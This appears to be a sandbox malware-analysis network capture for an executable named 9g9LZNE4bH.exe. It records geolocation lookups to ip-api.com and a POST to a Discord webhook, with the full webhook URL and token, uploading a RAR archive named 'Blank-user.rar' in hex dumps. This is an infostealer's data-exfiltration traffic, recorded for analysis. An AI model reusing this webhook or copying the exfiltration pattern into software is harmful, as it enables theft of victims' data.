Jan 4, 2025 09:42:35.015747070 CET | 443 | 49822 | 162.159.137.232 | 192.168.2.5
Jan 4, 2025 09:42:35.015815973 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.034303904 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.034321070 CET | 443 | 49822 | 162.159.137.232 | 192.168.2.5
Jan 4, 2025 09:42:35.492398977 CET | 443 | 49822 | 162.159.137.232 | 192.168.2.5
Jan 4, 2025 09:42:35.493822098 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.493843079 CET | 443 | 49822 | 162.159.137.232 | 192.168.2.5
Jan 4, 2025 09:42:35.495281935 CET | 443 | 49822 | 162.159.137.232 | 192.168.2.5
Jan 4, 2025 09:42:35.495356083 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.496556044 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.496624947 CET | 443 | 49822 | 162.159.137.232 | 192.168.2.5
Jan 4, 2025 09:42:35.497042894 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.497051954 CET | 443 | 49822 | 162.159.137.232 | 192.168.2.5
Jan 4, 2025 09:42:35.497114897 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.497136116 CET | 443 | 49822 | 162.159.137.232 | 192.168.2.5
Jan 4, 2025 09:42:35.497277021 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.497306108 CET | 443 | 49822 | 162.159.137.232 | 192.168.2.5
Jan 4, 2025 09:42:35.497428894 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.497447968 CET | 443 | 49822 | 162.159.137.232 | 192.168.2.5
Jan 4, 2025 09:42:35.497555017 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.497574091 CET | 443 | 49822 | 162.159.137.232 | 192.168.2.5
Jan 4, 2025 09:42:35.497592926 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.497603893 CET | 443 | 49822 | 162.159.137.232 | 192.168.2.5
Jan 4, 2025 09:42:35.497664928 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.497673988 CET | 443 | 49822 | 162.159.137.232 | 192.168.2.5
Jan 4, 2025 09:42:35.497695923 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.497704029 CET | 443 | 49822 | 162.159.137.232 | 192.168.2.5
Jan 4, 2025 09:42:35.497718096 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.497725964 CET | 443 | 49822 | 162.159.137.232 | 192.168.2.5
Jan 4, 2025 09:42:35.497745037 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.497751951 CET | 443 | 49822 | 162.159.137.232 | 192.168.2.5
Jan 4, 2025 09:42:35.497776031 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.497783899 CET | 443 | 49822 | 162.159.137.232 | 192.168.2.5
Jan 4, 2025 09:42:35.497793913 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.497802973 CET | 443 | 49822 | 162.159.137.232 | 192.168.2.5
Jan 4, 2025 09:42:35.497808933 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.497822046 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.497843981 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.497879028 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.497893095 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.497912884 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.497937918 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.497937918 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.497958899 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.497972012 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.497999907 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
Jan 4, 2025 09:42:35.507289886 CET | 443 | 49822 | 162.159.137.232 | 192.168.2.5
Jan 4, 2025 09:42:35.509293079 CET | 49822 | 443 | 192.168.2.5 | 162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.509321928 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.509346962 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.509394884 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.509429932 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.509429932 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.510206938 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.510255098 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.511823893 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.512047052 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.512079954 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.512111902 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.512139082 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.512164116 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.512181997 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.512207985 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.512221098 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.512240887 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.513060093 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:36.148323059 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:36.148387909 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:36.148468971 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:36.149060011 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:36.361680984 CET4981680192.168.2.5208.95.112.1
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:36.366792917 CET8049816208.95.112.1192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:36.369129896 CET4981680192.168.2.5208.95.112.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 4, 2025 09:42:34.163508892 CET | 53330 | 53 | 192.168.2.5 | 1.1.1.1
Jan 4, 2025 09:42:34.170417070 CET | 53 | 53330 | 1.1.1.1 | 192.168.2.5
Jan 4, 2025 09:42:35.007340908 CET | 64648 | 53 | 192.168.2.5 | 1.1.1.1
Jan 4, 2025 09:42:35.014811039 CET | 53 | 64648 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 4, 2025 09:42:34.163508892 CET | 192.168.2.5 | 1.1.1.1 | 0xbb9e | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jan 4, 2025 09:42:35.007340908 CET | 192.168.2.5 | 1.1.1.1 | 0x82e6 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 4, 2025 09:42:34.170417070 CET | 1.1.1.1 | 192.168.2.5 | 0xbb9e | No error (0) | ip-api.com | - | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 09:42:35.014811039 CET | 1.1.1.1 | 192.168.2.5 | 0x82e6 | No error (0) | discord.com | - | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 09:42:35.014811039 CET | 1.1.1.1 | 192.168.2.5 | 0x82e6 | No error (0) | discord.com | - | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 09:42:35.014811039 CET | 1.1.1.1 | 192.168.2.5 | 0x82e6 | No error (0) | discord.com | - | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 09:42:35.014811039 CET | 1.1.1.1 | 192.168.2.5 | 0x82e6 | No error (0) | discord.com | - | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 09:42:35.014811039 CET | 1.1.1.1 | 192.168.2.5 | 0x82e6 | No error (0) | discord.com | - | 162.159.135.232 | A (IP address) | IN (0x0001) | false
• discord.com
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49816 | 208.95.112.1 | 80 | 5860 | C:\Users\user\Desktop\9g9LZNE4bH.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 09:42:34.176166058 CET | 116 | OUT | GET /json/?fields=225545 HTTP/1.1
Host: ip-api.com
Accept-Encoding: identity
User-Agent: python-urllib3/2.3.0
Jan 4, 2025 09:42:34.758825064 CET | 381 | IN | HTTP/1.1 200 OK
Date: Sat, 04 Jan 2025 08:42:33 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 204
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49822 | 162.159.137.232 | 443 | 5860 | C:\Users\user\Desktop\9g9LZNE4bH.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-04 08:42:35 UTC | 302 | OUT | POST /api/webhooks/1324952562377691148/tMn5PGZkUcHw6GRus7vQh5nn9lZzv19crpx5XMfJnhrwGYXnAAQrWNBsuZgspVDvCX9c HTTP/1.1
Host: discord.com
Accept-Encoding: identity
Content-Length: 758909
User-Agent: python-urllib3/2.3.0
Content-Type: multipart/form-data; boundary=5bfc7a42494d43b6e137242c97784aaf
2025-01-04 08:42:35 UTC | 16384 | OUT | Data Raw: 2d 2d 35 62 66 63 37 61 34 32 34 39 34 64 34 33 62 36 65 31 33 37 32 34 32 63 39 37 37 38 34 61 61 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 61 6c 66 6f 6e 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 20 ff c9 60 21 04 00 00 01 0f 4b ec 9f 7d 7e 44 0d df f9 39 0f f8 ea 9e 84 7f 8c a6 9d 73 65 18 d5 9d 72 03 9e db 0a 3e 1e 43 68 e0 7e 73 3a a5 1d 78 47 6c 44 1e 72 e6 a2 a8 1c 3b b0 2e 95 b9 22 3b 5b 0d 80 e8 7b 62 fc 3b 7c af 23 62 25 70 2f db 61 51 1b c6 f2 1d 68 64 1c 10 94 e8 d0
Data Ascii: --5bfc7a42494d43b6e137242c97784aafContent-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar! `!K}~D9ser>Ch~s:xGlDr;.";[{b;|#b%p/aQhd
2025-01-04 08:42:35 UTC | 16384 | OUT | Data Raw: 0e bd 42 43 4b c7 6d 4c 7b e7 ae 02 3d 7b 38 eb 4e 5b 4d bc 39 15 1a db 36 da 7b 08 eb e8 c0 78 28 e1 c0 1a 45 e8 72 47 c7 81 b3 11 d1 36 2a 97 3d 07 24 0e 2c ab 7b 45 49 7f d2 5c c2 d1 40 29 19 3b 4d 29 4e 3b fc 64 4d a6 11 76 ac 7d ef 63 60 c3 60 08 b5 c1 2b 4c 3d 78 25 8a 4d 18 45 8e 4c 97 1f 22 89 c4 a9 6a ff 34 fa 45 1f 03 2e d9 c2 67 6b a0 41 83 ef 4a 82 93 58 b2 b3 52 69 f7 93 33 50 69 72 9f b3 a3 7c 68 f8 ff d7 78 0a 11 b7 af 48 4e 60 36 75 07 e5 a6 a3 f5 f1 44 48 14 75 56 33 4c b6 27 b2 f7 d7 80 d0 78 01 3d f1 36 10 46 5e 97 78 a0 bf b7 96 0c 0b c0 c4 a6 6b 3c 03 99 0f a7 e4 4c db bd 45 fa 7c 1f 7a 4d ee 80 4b 33 9f 6a a5 c3 6e 56 8e 84 12 29 b3 3d ff de 18 2a d4 a9 f9 67 e9 d2 71 9e 53 35 32 b7 5d 7f e0 7d 8b cf a4 73 4a b1 c6 0c 89 9f 88 bf 13
Data Ascii: BCKmL{={8N[M96{x(ErG6*=$,{EI\@);M)N;dMv}c``+L=x%MEL"j4E.gkAJXRi3Pir|hxHN`6uDHuV3L'x=6F^xk<LE|zMK3jnV)=*gqS52]}sJ
2025-01-04 08:42:35 UTC | 16384 | OUT | Data Raw: 50 6f 4d 76 29 c0 2f de bb e1 2a 57 b1 f3 72 e9 eb 50 81 31 6e fc 55 04 4a 5e 2e ed 04 46 01 e8 e0 6d de d0 55 3b 08 0e 4f b0 50 82 ef 30 b7 57 84 f9 41 c9 83 ef 46 0d 55 17 93 89 8b 8f 93 c0 ff 8f e5 25 38 87 27 a0 15 4a 97 f7 73 88 05 89 5c c6 09 f2 46 7b 66 7d 00 5d 65 9f f0 df 79 1f 75 d2 7d d7 9a bd d1 8f b1 21 d9 f8 62 b8 7b 20 31 4d b4 d0 46 fb 41 23 94 7d 24 25 18 34 fb 79 d6 7e b8 ab 24 85 54 89 ca 19 8b 5e 54 6c d4 ea f9 b0 80 20 9d f3 09 bc 07 59 e6 3d ba fe b9 ea 78 e6 62 3a b0 bb b5 fe f2 81 0a 4c 9e 2f a9 19 31 bf 22 54 d4 e2 43 26 35 2b 48 44 39 a9 3f 84 68 82 0b 8d f9 eb 53 e9 0f aa 3f 9c e2 21 69 2b 47 82 d0 6c 96 04 6d ff be 4d 6e d3 a9 b2 e1 41 3d 7f 96 21 e5 fc eb bc c3 47 ad 2d 8e e5 ae e6 09 31 03 6d c3 71 3a b7 ce 04 fc 58 61 8c 43
Data Ascii: PoMv)/*WrP1nUJ^.FmU;OP0WAFU%8'Js\F{f}]eyu}!b{ 1MFA#}$%4y~$T^Tl Y=xb:L/1"TC&5+HD9?hS?!i+GlmMnA=!G-1mq:XaC
2025-01-04 08:42:35 UTC | 16384 | OUT | Data Raw: 6e 79 c5 bf 01 00 63 fb f1 95 9c de 72 52 82 7a 71 91 75 98 fe c9 64 26 06 1e c3 c1 76 d9 31 13 5f aa c2 af 24 d6 da 59 cb 18 d7 98 73 97 23 e0 20 17 10 d3 45 ad a4 7b df 54 2f e8 40 e5 a9 da c5 f8 7c 58 42 33 4d ca 51 3e 62 f3 42 00 dc 5e d7 75 c6 35 9d 31 b1 57 25 71 90 0a 81 d4 54 d1 e7 85 2f 73 24 6c c3 f3 7d af 2b 96 14 10 0a 9e f8 a4 48 5b f8 ee 9c cc d9 cf 8a b1 34 8b 80 95 7a a1 d9 92 1e 6d 66 15 04 1c 7a 41 51 39 fd 94 03 dd 9a f7 64 42 08 92 c3 ef 0c 5f 06 62 e2 2c 88 1d 76 f5 3e 24 ab af c7 7e d9 d6 07 81 da b5 ed 44 1d 7c 1c f7 8f ad 97 ec 4a f6 87 41 4b 4c 62 88 00 4f 06 0d 22 1e 68 89 14 a2 38 b8 3c c1 d6 aa 54 cb 55 d9 7b e3 6d 10 5f 94 73 be c4 4a b0 13 91 6a 46 1d 75 3d d1 ef be 54 fa 7f c0 dd e6 7f 6f 4d b6 df 9c d9 f5 77 0a 9e 01 74 77
Data Ascii: nycrRzqud&v1_$Ys# E{T/@|XB3MQ>bB^u51W%qT/s$l}+H[4zmfzAQ9dB_b,v>$~D|JAKLbO"h8<TU{m_sJjFu=ToMwtw
2025-01-04 08:42:35 UTC | 16384 | OUT | Data Raw: 1d 9e dc 52 ea 02 89 84 45 72 66 54 db ad 31 3b 4d a9 fa db 7f 75 56 d3 c2 e2 47 e8 cb 00 24 51 f7 74 ea e0 08 4f 1f 81 28 31 f2 7e 6b e9 df 48 f0 d7 8a 7f 14 47 ef 1f f6 5f e1 64 ed 96 fc 4a ff 47 aa c7 96 5c de 08 b4 75 f6 cf c8 18 be 97 ea ea af 98 2e 2e 46 c9 28 8f 81 6a 9b ea 3b b7 be e4 25 2a 5b fd 34 c9 a4 ed 7b d8 eb 29 fd dc ce 4a 10 e7 13 28 12 e6 d3 d9 ff 25 b9 28 29 ab a8 69 93 c6 7c 5b 17 1b 51 5d 53 57 a7 df ee 1a 9b c1 d5 05 93 7e 35 3b ac 04 46 eb 75 f2 a1 95 60 bc e4 80 33 b4 93 69 b7 18 14 d5 3c 04 02 45 b2 09 15 54 f1 c9 bb 65 01 37 07 1f 3f ca 82 bd 13 1a 0b 6a 8e 1f ff 89 df 74 dd 96 1a ff 1b 2a 23 0f ba 09 2f 34 20 b8 49 1f 7b 8f 91 28 d5 20 54 3d 44 d1 bd e1 dd cc 7c ed 66 88 e7 3d d1 7d 3a e9 93 f5 fd d2 a1 23 18 9c 96 a3 0e b1 89
Data Ascii: RErfT1;MuVG$QtO(1~kHG_dJG\u..F(j;%*[4{)J(%()i|[Q]SW~5;Fu`3i<ETe7?jt*#/4 I{( T=D|f=}:#
2025-01-04 08:42:35 UTC | 16384 | OUT | Data Raw: de 5e 31 da 8f b1 93 e5 df b9 1a c6 73 c5 fe 10 67 4a 2d 1e a3 a0 74 84 e1 50 15 e9 d4 5e 92 54 aa e2 d7 cc d9 ad 84 98 c7 02 7d 28 4e 91 a7 36 ea ac 4d ef e3 7d 36 f3 b6 27 b2 33 e0 f7 51 8a d4 70 a5 56 91 c4 bb bd f6 a9 d6 1c 61 72 5a fb 5e 25 72 9a 8e e6 8b d6 b4 cc 87 84 11 f1 db d5 30 21 68 18 7f 34 93 56 d1 cc c7 aa 1f 6f 61 fb 91 97 51 43 99 10 18 f0 f6 8c 15 ce dd 9f 23 50 fa ab b1 1d 33 be ea a6 c2 b3 2e c6 96 1e 85 94 ce d2 58 e0 51 62 a8 08 33 bc a3 d5 5e 83 4f 4e 71 d9 66 0b 83 9b 69 73 df 0b 8b 42 8c 85 2b 2b 8b a6 c1 29 8c 01 47 e4 1c 50 1c e7 3d 66 42 28 78 7d 8c 6d be 1f 3f 25 44 b3 96 68 f1 11 67 28 fa 22 e8 df 56 4a 1b ab 52 67 29 92 07 a1 f5 86 f0 13 a0 13 9f f6 ed 5c 92 0d 4b 76 7c 24 10 7a c3 66 8a 85 e4 bb ab 31 92 ff ea 1a 8e 4e 3e
Data Ascii: ^1sgJ-tP^T}(N6M}6'3QpVarZ^%r0!h4VoaQC#P3.XQb3^ONqfisB++)GP=fB(x}m?%Dhg("VJRg)\Kv|$zf1N>
2025-01-04 08:42:35 UTC | 16384 | OUT | Data Raw: 27 a3 9e f8 48 17 3b 85 1f 34 d0 1e a4 4f 83 3d 85 a1 9c 03 19 98 15 ba 4d e8 33 2b 57 ee a9 d1 2e 70 b6 90 e9 46 94 1d 07 1a 31 11 42 b2 c7 63 25 1e f0 40 fe 90 a5 2b 6f 17 24 f7 f8 dc e7 b9 89 ab 1e f2 f0 08 97 cf 1a 4f 59 59 01 03 f4 c9 ef 76 7a 43 0f 8e 0f 75 ca 8f 85 52 58 2c 28 30 4e de 57 47 90 b6 85 f2 d3 74 ad 57 f7 83 24 34 83 5a 5c 7d 70 4d f6 9d 80 90 96 d7 83 88 4d 3c 5e 0e 84 b3 fc b1 41 bc 48 f5 ae c5 e6 6e 87 42 b7 ea a4 25 ba 00 69 fa dc d4 fd 88 01 50 c4 d8 31 d7 9f 06 64 88 57 ce 4e c3 0b 0d 32 db e3 15 d4 12 08 95 7b 9d ea 7f a2 33 4a 24 79 55 5a c5 66 9d 32 30 d8 57 9b 0e 54 a1 ae 3e f8 70 68 51 0e a7 b8 37 65 6a 5b dd 01 cf 06 be e3 cb 26 ff 1e a5 96 22 63 77 46 21 93 b3 26 5b ad f3 53 7a e4 bd 36 ed b2 a0 59 58 c8 94 02 25 48 38 23
Data Ascii: 'H;4O=M3+W.pF1Bc%@+o$OYYvzCuRX,(0NWGtW$4Z\}pMM<^AHnB%iP1dWN2{3J$yUZf20WT>phQ7ej[&"cwF!&[Sz6YX%H8#
2025-01-04 08:42:35 UTC | 16384 | OUT | Data Raw: 41 37 07 50 27 82 a6 8a c4 97 e2 18 6a 10 fd 49 97 0a e5 ae ee 5e 96 bb 88 79 d7 5e 41 2f 16 1e c0 94 a2 dc c0 3e 39 a5 aa 08 5f e0 9a 52 01 16 eb e2 1e a1 13 03 de 73 9d 02 b4 1a 0c dd 76 cc 70 2e ce f6 e3 02 4e 02 6f 6f b8 9d 3e 37 a2 c2 81 36 a9 25 7e ac 1b e9 cc dd 5a 99 ae e5 06 78 5e 98 65 d5 09 8c f0 9e 9c 39 53 ae cc aa 49 4f 9b 3d 33 ad 4d be a5 a5 c2 c4 bc 25 07 cf f5 3a d6 96 8e b6 d0 6d 2a 47 35 b2 c5 6c e8 11 13 d2 67 52 40 8f 59 60 84 4a f4 f9 0d c6 1e 68 c7 68 5d 24 c2 85 fd 8b 2e f3 61 2a f1 48 1a e6 66 0d 58 be 67 d4 76 35 1f 4e 86 6a cf 49 21 55 6a e0 84 08 a8 78 8a 58 cc 2a 1a cd 8f e4 b4 81 9a 08 76 d5 08 e5 d0 8f e7 45 ba b0 c0 85 18 8e 05 26 96 e4 35 be de 8c 34 1a 47 ab 82 02 30 6f 9b 82 92 da 4a b5 e3 ce cf 98 c3 1d 63 57 6c ce d3
Data Ascii: A7P'jI^y^A/>9_Rsvp.Noo>76%~Zx^e9SIO=3M%:m*G5lgR@Y`Jhh]$.a*HfXgv5NjI!UjxX*vE&54G0oJcWl
2025-01-04 08:42:35 UTC | 16384 | OUT | Data Raw: 07 32 26 b9 fd fe f0 cb 3a 8c 90 ce f3 29 89 c3 2a 75 38 67 b8 1b fb bd 2c e8 6e ce 48 3a cc 2f 26 82 fb 4a f7 b8 14 cb 31 f6 0c e0 5e 55 b8 5b be 37 97 47 cc 7b 08 22 cf 1d 2e d1 4f 74 35 f9 1f 66 c9 cf d6 e7 4d 5e f9 15 f1 54 05 5c 34 ac 86 e3 b7 27 33 7e b6 ec 47 7e fd 28 4b 68 c5 41 bc 0d 9a 40 3d a3 26 49 0a de aa 15 6e 6a 8e c2 85 ba 19 f2 bb aa 0b 0a 87 ca 0b 09 ba a6 79 9c 13 a7 54 cc d2 ea 5b 72 f0 c6 1e 87 14 37 02 6b 75 2c e9 df 6e d1 c3 9a 54 46 2f e0 66 18 e7 a7 0b b7 61 65 d5 a3 c5 66 7b af 78 64 53 03 25 d6 99 ee 10 5d 95 82 03 8e c7 72 7b 90 ed b3 cb 32 62 90 da 26 40 fe 5f 71 7f cd 13 1b c5 5c 3e c1 d7 24 c7 42 86 4a 1c 3b 3a a7 e9 e7 dc f5 a4 b6 05 9e 37 05 3a dd f1 42 6d 67 c8 79 52 6d 47 80 4f d5 6c 35 ac f5 4c a3 2b 08 ee 1d 05 96 cc
                                                                                                                                                                                                                                      Data Ascii: 2&:)*u8g,nH:/&J1^U[7G{".Ot5fM^T\4'3~G~(KhA@=&InjyT[r7ku,nTF/faef{xdS%]r{2b&@_q\>$BJ;:7:BmgyRmGOl5L+
                                                                                                                                                                                                                                      2025-01-04 08:42:35 UTC16384OUTData Raw: 1d 87 a5 4e b3 46 4b f5 36 3e a3 40 a1 98 d7 dd ad 9e 95 b0 c7 39 d5 c7 bc 92 c4 56 31 db b4 c2 ea 61 42 31 eb ab a1 90 26 70 ac 0d 07 85 8d e3 d0 4a 51 41 98 cb e8 eb a8 46 4d 00 da 26 e6 fc b1 0e 05 28 ec a8 32 39 a8 d9 e9 e9 e3 ba c5 bc c2 d0 ae 22 3b 23 76 d9 4a b0 29 77 65 e0 25 a2 f6 4b c7 29 7a ef 0d 65 2c 43 6f e2 9c e9 18 da cb 1f f0 4b b4 80 7a 39 87 b6 0b d7 b7 32 fe 7b c4 42 f8 0e 5a 47 5c 46 c4 4f cd 21 e1 50 75 6b c7 9a 38 86 eb 08 a2 f7 7d 9e b1 e3 b3 73 05 0f 0d 13 b5 2c ea 5f b2 44 7e 44 96 87 4d 81 ad a0 99 67 d3 bc e9 94 eb 44 f5 51 ea e4 26 27 74 7b 77 e6 75 c0 ab 0d e1 27 40 a2 9b aa 8a 84 de da 62 55 ab 89 63 00 e8 b8 7d de 5a 18 6b b9 c0 8f 2d 69 e3 d4 db 21 4d c3 93 1c ce bb 90 3b 5c b6 1c 32 5d 98 81 7b a3 3a 62 f1 36 0e 76 c6 1b
                                                                                                                                                                                                                                      Data Ascii: NFK6>@9V1aB1&pJQAFM&(29";#vJ)we%K)ze,CoKz92{BZG\FO!Puk8}s,_D~DMgDQ&'t{wu'@bUc}Zk-i!M;\2]{:b6v
                                                                                                                                                                                                                                      2025-01-04 08:42:36 UTC 1251 IN HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Date: Sat, 04 Jan 2025 08:42:36 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Content-Length: 45
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                      x-ratelimit-limit: 5
                                                                                                                                                                                                                                      x-ratelimit-remaining: 4
                                                                                                                                                                                                                                      x-ratelimit-reset: 1735980157
                                                                                                                                                                                                                                      x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                      via: 1.1 google
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vZ14Lq5OBiciWTSQo3QtMCr%2F8X6cwJ9wf3eutoNvbb0uAqGNSo93Y2pDbjSfnVuwbbq1AS6zHs60gYT3NmAAz1hSRLLxOhdM29NfzXgzgGlPkE51o6SRN96372NZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Set-Cookie: __cfruid=98f474b5012690ed569d92fa502bc01aa033d261-1735980156; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                      Set-Cookie: _cfuvid=MA7Uo7Wyd9dNQPITj.qM1rxHYjgtZpUmTVK4E25GdQk-1735980156106-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8fc9efa42c6e176c-EWR



                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                      Start time:03:41:58
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\9g9LZNE4bH.exe
